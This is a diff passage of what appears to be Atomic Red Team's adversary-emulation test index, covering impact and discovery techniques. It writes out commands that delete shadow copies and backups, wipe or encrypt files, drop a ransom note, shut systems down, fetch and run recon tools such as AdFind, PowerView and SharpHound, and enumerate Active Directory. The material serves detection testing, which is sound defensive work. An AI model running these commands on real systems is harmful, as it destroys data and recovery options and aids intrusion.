+ '
name: powershell
- name: Winlogon Notify Key Logon Persistence - PowerShell
auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -54705,7 +54705,7 @@ persistence:
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1547.013:
technique:
@@ -54849,7 +54849,7 @@ impact:
net.exe user #{user_account} #{new_password}
cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Delete User - Windows
@@ -54857,7 +54857,7 @@ impact:
description: 'Deletes a user account to prevent access. Upon execution, run
the command "net user" to verify that the new "AtomicUser" account was deleted.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -54879,21 +54879,21 @@ impact:
auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947
description: 'This test will remove an account from the domain admins group
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Requires the Active Directory module for powershell to be installed.
-'
+ '
prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
-'
+ '
input_arguments:
super_user:
description: Account used to run the execution command (must include domain).
@@ -55137,10 +55137,10 @@ impact:
- description: 'Secure delete tool from Sysinternals must exist on disk at specified
location (#{sdelete_exe})
-'
+ '
prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
@@ -55171,7 +55171,7 @@ impact:
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l
#{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes
-'
+ '
name: bash
- name: Overwrite deleted data on C drive
auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19
@@ -55183,7 +55183,7 @@ impact:
executor:
command: 'cipher.exe /w:C:
-'
+ '
name: command_prompt
T1486:
technique:
@@ -55263,7 +55263,7 @@ impact:
auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765
description: 'Uses gpg to encrypt a file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55287,10 +55287,10 @@ impact:
dependencies:
- description: 'Finds where gpg is located
-'
+ '
prereq_command: 'which_gpg=`which gpg`
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release gpg)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n"
executor:
@@ -55299,15 +55299,15 @@ impact:
command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd
0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
-'
+ '
cleanup_command: 'rm #{encrypted_file_path}
-'
+ '
- name: Encrypt files using 7z (Linux)
auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad
description: 'Uses 7z to encrypt a file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55327,10 +55327,10 @@ impact:
dependencies:
- description: 'Finds where 7z is located
-'
+ '
prereq_command: 'which_7z=`which 7z`
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -55345,7 +55345,7 @@ impact:
an inturruption authentication to target system. If root permissions are not
available then attempts to encrypt data within user''s home directory.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55372,7 +55372,7 @@ impact:
- description: 'Finds where ccencrypt and ccdecrypt is located and copies input
file
-'
+ '
prereq_command: |
which_ccencrypt=`which ccencrypt`
which_ccdecrypt=`which ccdecrypt`
@@ -55387,14 +55387,14 @@ impact:
#{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command};
fi
-'
+ '
cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path};
else cp #{cped_file_path} #{user_input_file_path}; fi \n"
- name: Encrypt files using openssl (Linux)
auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1
description: 'Uses openssl to encrypt a file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -55422,10 +55422,10 @@ impact:
dependencies:
- description: 'Finds where openssl is located
-'
+ '
prereq_command: 'which_openssl=`which openssl`
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -55448,10 +55448,10 @@ impact:
elevation_required: true
command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
-'
+ '
cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
-'
+ '
T1565:
technique:
object_marking_refs:
@@ -56102,18 +56102,18 @@ impact:
- description: 'Create volume shadow copy of C:\ . This prereq command only
works on Windows Server or Windows 8.
-'
+ '
prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
that satisfy the query.")) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: 'vssadmin.exe create shadow /for=c:
-'
+ '
executor:
command: 'vssadmin.exe delete shadows /all /quiet
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Delete Volume Shadow Copies via WMI
@@ -56126,7 +56126,7 @@ impact:
executor:
command: 'wmic.exe shadowcopy delete
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - wbadmin Delete Windows Backup Catalog
@@ -56139,7 +56139,7 @@ impact:
executor:
command: 'wbadmin delete catalog -quiet
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Disable Windows Recovery Console Repair
@@ -56170,7 +56170,7 @@ impact:
executor:
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
-'
+ '
name: powershell
elevation_required: true
- name: Windows - Delete Backup Files
@@ -56184,7 +56184,7 @@ impact:
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - wbadmin Delete systemstatebackup
@@ -56193,13 +56193,13 @@ impact:
technique is used by numerous ransomware families. This may only be successful
on server platforms that have Windows Backup enabled.
-'
+ '
supported_platforms:
- windows
executor:
command: 'wbadmin delete systemstatebackup -keepVersions:0
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Disable the SR scheduled task
@@ -56207,17 +56207,17 @@ impact:
description: 'Use schtasks.exe to disable the System Restore (SR) scheduled
task
-'
+ '
supported_platforms:
- windows
executor:
command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
-'
+ '
cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR"
/enable >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Disable System Restore Through Registry
@@ -56299,7 +56299,7 @@ impact:
auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3
description: 'Downloads an image from a URL and sets it as the desktop wallpaper.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -56666,7 +56666,7 @@ impact:
executor:
command: 'yes > /dev/null
-'
+ '
name: bash
T1565.003:
technique:
@@ -56884,10 +56884,10 @@ impact:
executor:
command: 'sc.exe stop #{service_name}
-'
+ '
cleanup_command: 'sc.exe start #{service_name} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Stop service using net.exe
@@ -56906,10 +56906,10 @@ impact:
executor:
command: 'net.exe stop #{service_name}
-'
+ '
cleanup_command: 'net.exe start #{service_name} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows - Stop service by killing process
@@ -56929,7 +56929,7 @@ impact:
executor:
command: 'taskkill.exe /f /im #{process_name}
-'
+ '
name: command_prompt
T1565.001:
technique:
@@ -57040,7 +57040,7 @@ impact:
auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64
description: 'This test shuts down a Windows system.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -57051,14 +57051,14 @@ impact:
executor:
command: 'shutdown /s /t #{timeout}
-'
+ '
name: command_prompt
elevation_required: true
- name: Restart System - Windows
auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302
description: 'This test restarts a Windows system.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -57069,14 +57069,14 @@ impact:
executor:
command: 'shutdown /r /t #{timeout}
-'
+ '
name: command_prompt
elevation_required: true
- name: Restart System via `shutdown` - macOS/Linux
auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb
description: 'This test restarts a macOS/Linux system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -57088,14 +57088,14 @@ impact:
executor:
command: 'shutdown -r #{timeout}
-'
+ '
name: bash
elevation_required: true
- name: Shutdown System via `shutdown` - macOS/Linux
auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de
description: 'This test shuts down a macOS/Linux system using a halt.
-'
+ '
supported_platforms:
- macos
- linux
@@ -57107,73 +57107,73 @@ impact:
executor:
command: 'shutdown -h #{timeout}
-'
+ '
name: bash
elevation_required: true
- name: Restart System via `reboot` - macOS/Linux
auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027
description: 'This test restarts a macOS/Linux system via `reboot`.
-'
+ '
supported_platforms:
- macos
- linux
executor:
command: 'reboot
-'
+ '
name: bash
elevation_required: true
- name: Shutdown System via `halt` - Linux
auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd
description: 'This test shuts down a Linux system using `halt`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'halt -p
-'
+ '
name: bash
elevation_required: true
- name: Reboot System via `halt` - Linux
auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e
description: 'This test restarts a Linux system using `halt`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'halt --reboot
-'
+ '
name: bash
elevation_required: true
- name: Shutdown System via `poweroff` - Linux
auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa
description: 'This test shuts down a Linux system using `poweroff`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'poweroff
-'
+ '
name: bash
elevation_required: true
- name: Reboot System via `poweroff` - Linux
auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41
description: 'This test restarts a Linux system using `poweroff`.
-'
+ '
supported_platforms:
- linux
executor:
command: 'poweroff --reboot
-'
+ '
name: bash
elevation_required: true
T1565.002:
@@ -57344,10 +57344,10 @@ discovery:
dependencies:
- description: 'T1010.cs must exist on disk at specified location (#{input_source_code})
-'
+ '
prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
@@ -57357,7 +57357,7 @@ discovery:
#{output_file_name}
cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
-'
+ '
name: command_prompt
T1217:
technique:
@@ -57407,7 +57407,7 @@ discovery:
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
that contains bookmarks and lists any found instances to a text file.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -57421,14 +57421,14 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List Mozilla Firefox Bookmark Database Files on macOS
auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
that contains bookmarks and lists any found instances to a text file.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -57442,14 +57442,14 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List Google Chrome Bookmark JSON Files on macOS
auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc
description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
bookmarks in JSON format and lists any found instances to a text file.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -57463,7 +57463,7 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List Google Chrome / Opera Bookmarks on Windows with powershell
auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545
@@ -57476,7 +57476,7 @@ discovery:
command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction
SilentlyContinue -Force
-'
+ '
name: powershell
- name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt
auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5
@@ -57488,7 +57488,7 @@ discovery:
executor:
command: 'where /R C:\Users\ Bookmarks
-'
+ '
name: command_prompt
- name: List Mozilla Firefox bookmarks on Windows with command prompt
auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5
@@ -57500,7 +57500,7 @@ discovery:
executor:
command: 'where /R C:\Users\ places.sqlite
-'
+ '
name: command_prompt
- name: List Internet Explorer Bookmarks using the command prompt
auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85
@@ -57511,14 +57511,14 @@ discovery:
executor:
command: 'dir /s /b %USERPROFILE%\Favorites
-'
+ '
name: command_prompt
- name: List Safari Bookmarks on MacOS
auto_generated_guid: 5fc528dd-79de-47f5-8188-25572b7fafe0
description: 'This test searches for Safari''s Bookmarks file (on macOS) and
lists any found instances to a text file.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -57531,7 +57531,7 @@ discovery:
\ncat #{output_file} \n"
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
T1087.004:
technique:
@@ -58062,7 +58062,7 @@ discovery:
description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
user account and group information will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58076,7 +58076,7 @@ discovery:
description: 'Enumerate logged on users. Upon exeuction, logged on users will
be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -58087,7 +58087,7 @@ discovery:
executor:
command: 'query user /SERVER:#{computer_name}
-'
+ '
name: command_prompt
- name: Automated AD Recon (ADRecon)
auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
@@ -58105,18 +58105,18 @@ discovery:
dependencies:
- description: 'ADRecon must exist on disk at specified location (#{adrecon_path})
-'
+ '
prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1"
-OutFile #{adrecon_path}
-'
+ '
executor:
command: 'Invoke-Expression #{adrecon_path}
-'
+ '
cleanup_command: |
Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null
Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
@@ -58137,14 +58137,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -58166,14 +58166,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -sc admincountdmp\n"
name: command_prompt
@@ -58193,14 +58193,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=person)\n"
name: command_prompt
@@ -58220,14 +58220,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -sc exchaddresses\n"
name: command_prompt
@@ -58236,13 +58236,13 @@ discovery:
description: 'This test will enumerate the details of the built-in domain admin
account
-'
+ '
supported_platforms:
- windows
executor:
command: 'net user administrator /domain
-'
+ '
name: command_prompt
- name: Enumerate Active Directory for Unconstrained Delegation
auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
@@ -58265,7 +58265,7 @@ discovery:
dependencies:
- description: 'PowerShell ActiveDirectory Module must be installed
-'
+ '
prereq_command: |
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
@@ -58286,13 +58286,13 @@ discovery:
command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
-Server #{domain}
-'
+ '
- name: Get-DomainUser with PowerView
auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
description: 'Utilizing PowerView, run Get-DomainUser to identify the domain
users. Upon execution, Users within the domain will be listed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58379,7 +58379,7 @@ discovery:
executor:
command: 'get-ADPrincipalGroupMembership #{user} | select name
-'
+ '
name: powershell
- name: Elevated group enumeration using net group (Domain)
auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
@@ -58401,7 +58401,7 @@ discovery:
execution, progress and info about each host in the domain being scanned will
be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58415,7 +58415,7 @@ discovery:
machines in the domain. Upon execution, information about each machine will
be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58428,7 +58428,7 @@ discovery:
description: 'takes a computer and determines who has admin rights over it through
GPO enumeration. Upon execution, information about the machine will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -58446,39 +58446,39 @@ discovery:
description: 'When successful, accounts that do not require kerberos pre-auth
will be returned
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Computer must be domain joined.
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually.
-'
+ '
- description: 'Requires the Active Directory module for powershell to be installed.
-'
+ '
prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
-'
+ '
executor:
name: powershell
elevation_required: false
command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth
-eq $TRUE}
-'
+ '
- name: Adfind - Query Active Directory Groups
auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274
description: |
@@ -58495,10 +58495,10 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
@@ -58517,7 +58517,7 @@ discovery:
name: powershell
command: 'Get-AdGroup -Filter *
-'
+ '
- name: Enumerate Active Directory Groups with ADSISearcher
auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
description: |
@@ -58531,7 +58531,7 @@ discovery:
elevation_required: false
command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
-'
+ '
- name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
description: |
@@ -58543,39 +58543,39 @@ discovery:
dependencies:
- description: 'Computer must be domain joined.
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually.
-'
+ '
- description: 'Requires the Active Directory module for powershell to be installed.
-'
+ '
prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
-'
+ '
executor:
name: powershell
elevation_required: false
command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties
useraccountcontrol | Format-Table name
-'
+ '
- name: Get-DomainGroupMember with PowerView
auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain
users. Upon execution, progress and info about groups within the domain being
scanned will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58588,7 +58588,7 @@ discovery:
description: 'Utilizing PowerView, run Get-DomainGroup to identify the domain
groups. Upon execution, Groups within the domain will be listed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58679,7 +58679,7 @@ discovery:
executor:
command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
-'
+ '
name: command_prompt
- name: Windows - Discover domain trusts with nltest
auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe
@@ -58692,17 +58692,17 @@ discovery:
dependencies:
- description: 'nltest.exe from RSAT must be present on disk
-'
+ '
prereq_command: 'WHERE nltest.exe >NUL 2>&1
-'
+ '
get_prereq_command: 'echo Sorry RSAT must be installed manually
-'
+ '
executor:
command: 'nltest /domain_trusts
-'
+ '
name: command_prompt
- name: Powershell enumerate domains and forests
auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30
@@ -58715,26 +58715,26 @@ discovery:
dependencies:
- description: 'PowerView PowerShell script must exist on disk
-'
+ '
prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1"
-OutFile "$env:TEMP\PowerView.ps1"
-'
+ '
- description: 'RSAT PowerShell AD admin cmdlets must be installed
-'
+ '
prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And
(Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else {
exit 1 }
-'
+ '
get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually"
-'
+ '
executor:
command: |
Import-Module "$env:TEMP\PowerView.ps1"
@@ -58759,14 +58759,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
name: command_prompt
@@ -58786,14 +58786,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -gcb -sc trustdmp\n"
name: command_prompt
@@ -58803,7 +58803,7 @@ discovery:
Upon execution, progress and info about trusts within the domain being scanned
will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58817,7 +58817,7 @@ discovery:
Upon execution, progress and info about forest trusts within the domain being
scanned will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58955,7 +58955,7 @@ discovery:
description: 'Find or discover files on the file system. Upon execution, file
and folder information will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -58994,13 +58994,13 @@ discovery:
which sh
cleanup_command: 'rm #{output_file}
-'
+ '
name: sh
- name: Nix File and Directory Discovery 2
auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e
description: 'Find or discover files on the file system
-'
+ '
supported_platforms:
- macos
- linux
@@ -59044,7 +59044,7 @@ discovery:
| Out-File -append #{File_to_output}}\n}\ncat #{File_to_output}\n"
cleanup_command: 'remove-item #{File_to_output} -ErrorAction SilentlyContinue
-'
+ '
name: powershell
T1615:
technique:
@@ -59122,7 +59122,7 @@ discovery:
elevation_required: false
command: 'gpresult /z
-'
+ '
T1016.001:
technique:
object_marking_refs:
@@ -59211,7 +59211,7 @@ discovery:
auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f
description: 'Enumerate all accounts by copying /etc/passwd to another file
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -59225,7 +59225,7 @@ discovery:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
- name: View sudoers access
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
@@ -59244,14 +59244,14 @@ discovery:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
elevation_required: true
- name: View accounts with UID 0
auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397
description: 'View accounts with UID 0
-'
+ '
supported_platforms:
- linux
- macos
@@ -59266,36 +59266,36 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: List opened files by user
auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
description: 'List opened files by user
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'username=$(id -u -n) && lsof -u $username
-'
+ '
name: sh
dependency_executor_name: sh
dependencies:
- description: 'check if lsof exists
-'
+ '
prereq_command: 'which lsof
-'
+ '
get_prereq_command: "(which yum && yum -y install lsof)||(which apt-get &&
DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n"
- name: Show if a user account has ever logged in remotely
auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110
description: 'Show if a user account has ever logged in remotely
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -59307,27 +59307,27 @@ discovery:
dependencies:
- description: 'Check if lastlog command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: 'sudo apt-get install login; exit 1;
-'
+ '
executor:
command: |
lastlog > #{output_file}
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
- name: Enumerate users and groups
auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e
description: 'Utilize groups and id to enumerate users and groups
-'
+ '
supported_platforms:
- linux
- macos
@@ -59340,7 +59340,7 @@ discovery:
auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2
description: 'Utilize local utilities to enumerate users and groups
-'
+ '
supported_platforms:
- macos
executor:
@@ -59371,7 +59371,7 @@ discovery:
description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
user account and group information will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -59391,13 +59391,13 @@ discovery:
description: 'Enumerate logged on users. Upon execution, logged on users will
be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'query user
-'
+ '
name: command_prompt
T1069.001:
technique:
@@ -59441,7 +59441,7 @@ discovery:
auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae
description: 'Permission Groups Discovery
-'
+ '
supported_platforms:
- macos
- linux
@@ -59483,7 +59483,7 @@ discovery:
description: 'This module runs the Windows executable of SharpHound in order
to remotely list members of the local Administrators group (SAMR)
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -59507,11 +59507,11 @@ discovery:
prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit
1 }
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true"
-OutFile "#{sharphound_path}"
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -59520,19 +59520,19 @@ discovery:
& "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}"
cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore
